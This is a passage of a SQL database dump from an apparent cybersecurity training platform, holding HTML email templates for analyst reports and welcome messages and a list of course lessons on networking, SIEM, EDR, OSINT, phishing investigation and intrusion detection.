bold; font-size: 14px; text-transform: uppercase; letter-spacing: 1px;\\\">📅 This Week\'s Activity</span>\\n                            </div>\\n                            \\n                            <table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\n                                <tr>\\n                                    <td width=\\\"50%\\\" style=\\\"padding-bottom: 15px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px;\\\">Alerts Assigned</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:20px; font-weight:bold;\\\">{{assigned}}</p>\\n                                    </td>\\n                                    <td width=\\\"50%\\\" style=\\\"padding-bottom: 15px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px;\\\">Investigations Closed</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:20px; font-weight:bold;\\\">{{graded}}</p>\\n                                    </td>\\n                                </tr>\\n                                <tr>\\n                                    <td width=\\\"50%\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px;\\\">Average Score</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#00ff41; font-size:20px; font-weight:bold;\\\">{{avgScore}}%</p>\\n                                    </td>\\n                                    <td width=\\\"50%\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px;\\\">XP Earned</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#b026ff; font-size:20px; font-weight:bold;\\\">+{{totalScore}} XP</p>\\n                                    </td>\\n                                </tr>\\n                            </table>\\n                        </td>\\n                    </tr>\\n\\n                    <!-- All Time Stats -->\\n                    <tr>\\n                        <td style=\\\"background-color: #1a1b1e; border-radius: 12px; padding: 25px; display: block; margin-top: 20px;\\\">\\n                            <div style=\\\"border-bottom: 1px solid #2a2a3e; padding-bottom: 15px; margin-bottom: 20px;\\\">\\n                                <span style=\\\"color: #00ff41; font-weight: bold; font-size: 14px; text-transform: uppercase; letter-spacing: 1px;\\\">🏆 Career Performance</span>\\n                            </div>\\n                            \\n                            <table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\n                                <tr>\\n                                    <td width=\\\"33%\\\" style=\\\"padding-bottom: 20px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:11px;\\\">Total Investigations</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:18px; font-weight:bold;\\\">{{totalInvestigations}}</p>\\n                                    </td>\\n                                    <td width=\\\"33%\\\" style=\\\"padding-bottom: 20px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:11px;\\\">Total XP</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:18px; font-weight:bold;\\\">{{totalXP}}</p>\\n                                    </td>\\n                                    <td width=\\\"33%\\\" style=\\\"padding-bottom: 20px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:11px;\\\">Best Score</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#f59e0b; font-size:18px; font-weight:bold;\\\">{{bestScore}}</p>\\n                                    </td>\\n                                </tr>\\n                                <tr>\\n                                    <td colspan=\\\"3\\\" style=\\\"background-color: #0e0f11; border-radius: 8px; padding: 15px; text-align: center;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px; margin-bottom: 5px;\\\">Current Leaderboard Rank</p>\\n                                        <p style=\\\"margin:0; color:#b026ff; font-size:24px; font-weight:bold;\\\">#{{rank}}</p>\\n                                    </td>\\n                                </tr>\\n                            </table>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- CTA -->\\n                    <tr>\\n                        <td style=\\\"text-align: center; padding: 40px 0;\\\">\\n                            <a href=\\\"{{baseUrl}}/dashboard\\\" style=\\\"display: inline-block; background: linear-gradient(135deg, #b026ff, #6366f1); color: white; text-decoration: none; padding: 14px 30px; border-radius: 8px; font-weight: 600; font-size: 15px; box-shadow: 0 4px 15px rgba(99, 102, 241, 0.4);\\\">\\n                                Go to Dashboard →\\n                            </a>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- Footer -->\\n                    <tr>\\n                        <td style=\\\"text-align: center; padding-top: 30px; border-top: 1px solid #2a2a3e;\\\">\\n                            <p style=\\\"color: #666; font-size: 12px; margin: 0;\\\">\\n                                You are receiving this report as part of your active analyst status.<br>\\n                                <a href=\\\"{{baseUrl}}/profile\\\" style=\\\"color: #888; text-decoration: none;\\\">Manage Notifications</a>\\n                            </p>\\n                            <p style=\\\"color: #444; font-size: 11px; margin-top: 10px;\\\">\\n                                &copy; 2026 InfoSecLabs Platform\\n                            </p>\\n                        </td>\\n                    </tr>\\n                </table>\\n            </td>\\n        </tr>\\n    </table>\\n</body>\\n</html>\\n    \"', 'email_template', '2026-03-16 06:05:29'),
('weekly_report_last_run', '\"2026-03-09\"', 'system', '2026-03-13 05:11:26'),
('weekly_report_subject', '\"Weekly Analyst Report\"', 'email_template', '2026-03-16 06:05:29'),
('welcome_email_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Deployment Authorized</h1> <p>Analyst credentials active.</p> <p>Your objective is to investigate realistic cyber threats, analyze logs, and defend the network. Every correct verdict improves your rank on the global leaderboard.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #00ff41;\\\"> <p style=\\\"margin:0; color:#00ff41; font-weight:bold;\\\">Mission Brief</p> <ul style=\\\"margin:10px 0 0 0; padding-left:20px; color:#ddd;\\\"> <li>Investigate Incidents</li> <li>Earn XP & Badges</li> <li>Competite with Top Analysts</li> </ul> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\">Access Dashboard</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('welcome_email_subject', '\"Deployment Authorized: Welcome to InfoSecLabs\"', 'email_template', '2026-03-16 06:05:29');

-- --------------------------------------------------------

--
-- Table structure for table `tasks`
--

CREATE TABLE `tasks` (
  `id` int(11) NOT NULL,
  `module_id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `task_type` enum('reading','challenge','quiz','alert_link','external_resource') DEFAULT 'reading',
  `task_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `xp_reward` int(11) DEFAULT 50,
  `display_order` int(11) DEFAULT 0,
  `is_active` tinyint(1) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `alert_id` int(11) DEFAULT NULL
) ;

--
-- Dumping data for table `tasks`
--

INSERT INTO `tasks` (`id`, `module_id`, `title`, `description`, `task_type`, `task_data`, `xp_reward`, `display_order`, `is_active`, `created_at`, `updated_at`, `alert_id`) VALUES
(1, 1, 'What is Cybersecurity?', 'Read about cybersecurity fundamentals, the CIA Triad, and why security matters in the digital age.', 'reading', NULL, 20, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(2, 1, 'Understanding Threats and Vulnerabilities', 'Learn the difference between threats, vulnerabilities, and risks. Explore common attack vectors.', 'reading', NULL, 30, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(3, 1, 'Career Paths in Cybersecurity', 'Discover different career paths: SOC Analyst, Penetration Tester, Security Engineer, and more.', 'reading', NULL, 20, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(4, 1, 'Quiz: Cybersecurity Basics', 'Test your knowledge of fundamental cybersecurity concepts.', 'quiz', NULL, 50, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(5, 1, 'Setting Up Your Lab Environment', 'Install VirtualBox and download your first security-focused Linux distribution.', 'challenge', NULL, 100, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(6, 2, 'Navigating the File System', 'Learn cd, ls, pwd commands. Practice moving through directories.', 'challenge', NULL, 40, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(7, 2, 'File Manipulation', 'Master cp, mv, rm, mkdir, touch commands for managing files and directories.', 'challenge', NULL, 40, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(8, 2, 'Understanding Permissions', 'Learn about user, group, and other permissions using chmod and chown.', 'reading', NULL, 50, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(9, 2, 'Searching and Finding Files', 'Use find, locate, and which commands to search for files.', 'challenge', NULL, 40, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(10, 2, 'Text Manipulation with grep', 'Learn to search file contents using grep with regular expressions.', 'challenge', NULL, 50, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(11, 2, 'Process Management', 'Understand ps, top, kill commands for managing running processes.', 'challenge', NULL, 50, 6, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(12, 2, 'Package Management', 'Install and manage software using apt/yum package managers.', 'challenge', NULL, 40, 7, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(22, 4, 'OSI Model Explained', 'Learn the 7 layers of the OSI model and their functions.', 'reading', NULL, 40, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(23, 4, 'TCP/IP Protocol Suite', 'Understand TCP vs UDP, common ports, and the three-way handshake.', 'reading', NULL, 50, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(24, 4, 'IP Addressing and Subnetting', 'Learn IPv4 addressing, subnet masks, and CIDR notation.', 'challenge', NULL, 60, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(25, 4, 'Subnetting Practice', 'Complete subnetting exercises to master network calculations.', 'challenge', NULL, 70, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(26, 4, 'DNS Fundamentals', 'Understand how DNS works, record types (A, AAAA, MX, CNAME), and DNS queries.', 'reading', NULL, 50, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(27, 4, 'DHCP and ARP', 'Learn how DHCP assigns IP addresses and how ARP maps IPs to MAC addresses.', 'reading', NULL, 40, 6, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(28, 4, 'Common Network Protocols', 'Explore HTTP/HTTPS, FTP, SSH, SMTP, and their security implications.', 'reading', NULL, 50, 7, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(30, 4, 'Network Traffic Analysis Challenge', 'Analyze a PCAP file to identify suspicious network activity.', 'challenge', NULL, 100, 9, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(31, 4, 'Quiz: Networking Essentials', 'Test your networking knowledge with a comprehensive quiz.', 'quiz', NULL, 60, 10, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(32, 9, 'Windows File System', NULL, 'reading', NULL, 25, 1, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(33, 9, 'User Account Control', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(34, 9, 'Windows Registry', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(35, 9, 'Active Directory Intro', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(36, 9, 'PowerShell Fundamentals', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(37, 9, 'Windows Event Logs', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(38, 9, 'Group Policy', NULL, 'reading', NULL, 25, 7, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(39, 9, 'Windows Security Tools', NULL, 'reading', NULL, 25, 8, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(40, 10, 'CIA Triad', NULL, 'reading', NULL, 25, 1, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(41, 10, 'Authentication Methods', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(42, 10, 'Authorization', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(43, 10, 'Accounting', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(44, 10, 'Encryption Basics', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(45, 10, 'Hashing vs Encryption', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(46, 10, 'Defense in Depth', NULL, 'reading', NULL, 25, 7, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(47, 10, 'Quiz: Security Principles', NULL, 'reading', NULL, 25, 8, 1, '2025-12-26 02:44:43', '2025-12-26 20:57:55', NULL),
(48, 11, 'Navigating Directories', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(49, 11, 'Reading Files', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(50, 11, 'Host Identity', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(51, 11, 'IP Configuration', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(52, 11, 'Terminating Processes', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(54, 12, 'Anatomy of a Log', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(55, 12, 'SSH Authentication', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(56, 12, 'Web Access Logs', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(57, 12, 'Windows Event Logs', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(58, 12, 'Detecting Web Attacks', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(59, 12, 'Firewall & Network Logs', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(60, 12, 'Command Injection', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(61, 12, 'Advanced Obfuscation', NULL, 'reading', NULL, 30, 8, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(72, 14, 'What is a Proxy?', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(73, 14, 'Burp Suite Basics', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(74, 14, 'Intercepting Requests', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(75, 14, 'Repeater & Decoder', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(76, 14, 'Proxy Chaining & VPNs', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(77, 15, 'IDS vs IPS: Architecture', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(78, 15, 'Detection Methodologies', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(79, 15, 'Network (NIDS) vs Host (HIDS)', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(81, 15, 'Zeek (Bro) Surveillance', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(82, 15, 'Alert Triage & Investigation', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(83, 15, 'Handling False Positives', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(84, 16, 'The Vulnerability Lifecycle', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(85, 16, 'Authenticated vs Unauthenticated', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(86, 16, 'Decoding CVSS Scores', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(87, 16, 'Nessus Operations', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(88, 16, 'Analyzing Scan Reports', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(89, 16, 'Patch Management Strategy', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(90, 16, 'Understanding CVEs', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(91, 16, 'Risk Response Strategies', NULL, 'reading', NULL, 30, 8, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(92, 17, 'DAST Fundamentals', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(93, 17, 'OWASP Top 10 Deep Dive', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(94, 17, 'OWASP ZAP Mastery', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(95, 17, 'Advanced Spidering', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(96, 17, 'Active Scanning Mechanics', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(97, 17, ' Identifying DAST False Positives', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(98, 17, 'Effective Remediation Reporting', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(160, 16, 'Module 16 Final Quiz', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:51:15', NULL),
(181, 18, 'What is OSINT?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(182, 18, 'The Intelligence Cycle', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(183, 18, 'OPSEC & Sock Puppets', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(184, 18, 'Google Dorking Mastery', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(185, 18, 'People & Username Recon', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(186, 18, 'Email & Breach Data', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(187, 18, 'Image Intelligence (IMINT)', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(188, 18, 'Domain & Infrastructure', NULL, 'reading', NULL, 40, 8, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(189, 18, 'Geolocation & Maps', NULL, 'reading', NULL, 40, 9, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(190, 18, 'Module 18 Final Quiz', NULL, 'reading', NULL, 40, 10, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(191, 19, 'Email Anatomy: RFC 5322', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(192, 19, 'Authentication: SPF, DKIM, DMARC', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(193, 19, 'Investigation 1: The CEO Fraud', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(194, 19, 'Investigation 2: Malicious Attachment', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(195, 19, 'Investigation 3: The Credential Harvest', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(196, 19, 'Module 19 Final Quiz', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(201, 20, 'Psychology of Persuasion', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(202, 20, 'Pretexting & Impersonation', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(203, 20, 'Vishing (Voice Phishing)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(204, 20, 'Smishing (SMS Phishing)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(205, 20, 'Physical: Tailgating & Dumpster Diving', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(206, 20, 'Baiting & Quid Pro Quo', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(207, 20, 'Module 20 Final Quiz', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(211, 21, 'Introduction to Virtualization', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(212, 21, 'Hypervisors: Type 1 vs Type 2', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(213, 21, 'Setting Up VirtualBox (Free)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(214, 21, 'Setting Up VMware Workstation', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(215, 21, 'Creating Your First VM (Kali Linux)', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(216, 21, 'Network Modes: NAT, Bridged, Host-Only', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(217, 21, 'Snapshots & Clones (The Safety Net)', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(221, 22, 'What is a SIEM?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(222, 22, 'Log Sources & Ingestion', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(223, 22, 'Normalization & Parsing', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(224, 22, 'Correlation Rules (The Magic)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(225, 22, 'Market Leaders: Splunk vs Sentinel', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(226, 22, 'Open Source: The ELK Stack', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(227, 22, 'Wazuh: The Modern Open SIEM', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(228, 22, 'Final Quiz', NULL, 'reading', NULL, 40, 8, 1, '2025-12-26 02:45:46', '2025-12-26 22:38:12', NULL),
(231, 23, 'Use Case 1: Brute Force Attack (Easy)', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(232, 23, 'Use Case 2: Malware Beaconing (Easy)', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(233, 23, 'Use Case 3: Impossible Travel (Medium)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(234, 23, 'Use Case 4: Privilege Escalation (Medium)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(235, 23, 'Use Case 5: DNS Tunneling (Hard)', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(236, 23, 'Final Quiz', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:43:08', NULL),
(241, 24, 'What is EDR?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(242, 24, 'EDR vs Antivirus', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(243, 24, 'The Process Tree (Deep Dive)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(244, 24, 'Reading Process Ancestry', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(245, 24, 'Suspicious Parent-Child Relationships', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(246, 24, 'EDR Market Leaders', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(247, 24, 'Final Quiz', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(251, 25, 'IDS Types: NIDS vs HIDS', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(252, 25, 'Signature vs Anomaly Detection', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(253, 25, 'Snort: The Open-Source IDS', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(254, 25, 'Suricata: The Modern Alternative', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(255, 25, 'Analyzing IDS Alerts', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(256, 25, 'Final Quiz', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
